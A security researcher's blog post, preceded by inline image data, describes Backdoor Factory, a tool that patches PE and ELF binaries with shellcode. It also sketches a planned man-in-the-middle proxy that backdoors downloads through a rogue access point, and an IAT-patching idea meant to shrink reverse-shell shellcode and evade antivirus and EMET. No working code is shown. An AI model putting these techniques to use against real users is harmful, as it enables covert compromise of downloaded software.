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" /><br />
<br />
Alas, I probably could have picked a better name.<br />
<br />
No matter, time to sleep in the bed I made. <br />
<br />
Backdoor Factory (BdF or BDF) is the result of taking the Cracking the Perimeter from Offensive Security. During the CTP, you learn to patch PE files by hand, among other awesome things. However, I like automation. Although it's taken a lot of time to write BDF, the ability to patch both PE and ELF file formats has taught me a lot about how windows and linux OS'es work as far as loading each format into memory and linking.<br />
<br />
Now I'm working on BDFProxy, patching binaries over HTTP(S) via a transparent proxy MITM style. I have have a full working demo using a wifi pineapple as a wireless AP with a VM running BDFProxy with two NICs. It's fast, multi-threaded, and will support archive files (zip, tar). Release timeline will depend on Con acceptance. :)<br />
<br />
Here, I made a diagram: <br />
<Internet>---<BDFPROXY>----<Evil AP> <br />
<br />
Also, I'm looking into the Mach-o format. Similar to ELF, but not. Like the 90's version of the Red Hot Chilli Peppers compared to the 00's version. Once Mach-o is supported, I'll be moving on to ARM chipsets.<br />
<br />
But before ARM, I want to dive into import address table (IAT) patching. Not hooking. Patching. Let's think about this. There has been plenty of writing about hooking the IAT and let's face it, if it's on CodeProject or Infosec Institute, it's been out there a long time. Patching the IAT would include adding thunks for each API call that you need to complete the functionality of your shellcode. I think by adding the necessary thunks to a BDF target binary, we could take a 380 byte shellcode (reverse tcp) and shorten it to less than 200 bytes by removing Steven Fewer's API lookup shellcode. Yes, it's not position independent, but if you are patching a binary, you don't need to be position independent; you should know where you are in memory at any given instruction before even running your executable. I have a feeling this will defeat <strike>most</strike> all AVs as you will be making legitimate API calls. As a bonus this should defeat the EMET's caller protection (ROP protection, which works only on 32 bit anyway). I hope to have this done by Fall 2014. <br />
<br />
So why BDF?<br />
<br />
To learn binary executable formats, to show everyone that HTTPS should be everywhere and whitelisting should be easy to implement/come standard on OS'es, and to show that AVs really don't work.midnite_runrhttp://www.blogger.com/profile/14122685015764808622noreply@blogger.com0